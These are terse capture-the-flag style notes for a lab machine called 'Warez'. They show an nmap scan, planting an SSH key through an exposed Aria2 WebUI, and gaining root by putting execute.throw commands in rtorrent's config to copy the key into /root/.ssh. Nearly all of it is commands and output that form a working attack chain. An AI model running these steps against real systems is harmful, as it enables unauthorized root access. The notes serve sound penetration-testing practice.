NOTES ABOUT Warez

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.23

PORT   STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 cc:00:63:dd:49:fb:1c:c7:ac:69:63:bc:05:1a:59:cd (RSA)
|   256 9b:19:49:25:eb:9c:60:c5:2b:ec:2a:d4:fd:d1:c2:f4 (ECDSA)
|_  256 41:16:e6:d0:a0:da:22:4f:07:3f:c8:cf:60:2c:02:79 (ED25519)
80/tcp   open  http    nginx 1.18.0
|_http-title: Aria2 WebUI
|_http-server-header: nginx/1.18.0
6800/tcp open  http    aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.

GETTING IN

$ cp ./id_rsa.pub authorized_keys

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.0.2.23 - - [09/Oct/2022 22:16:09] "GET /authorized_keys HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

# DOWNLOAD authorized_keys VIA ARIA2 WEBUI TO /home/carolina/.ssh

$ ssh -i id_rsa carolina@10.0.2.23 
carolina@warez:~$ cat user.txt 
***********

ELEVATING PRIVILEGES

carolina@warez:~$ echo "execute.throw = mkdir, /root/.ssh" > .rtorrent.rc 
carolina@warez:~$ rtorrent
carolina@warez:~$ echo "execute.throw = cp, /home/carolina/.ssh/authorized_keys, /root/.ssh/authorized_keys" > .rtorrent.rc 
carolina@warez:~$ rtorrent

$ ssh -i ./id_rsa root@10.0.2.23
Linux warez 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 31 02:34:57 2021
root@warez:~# cat root.txt 
*************

root@warez:~# init 0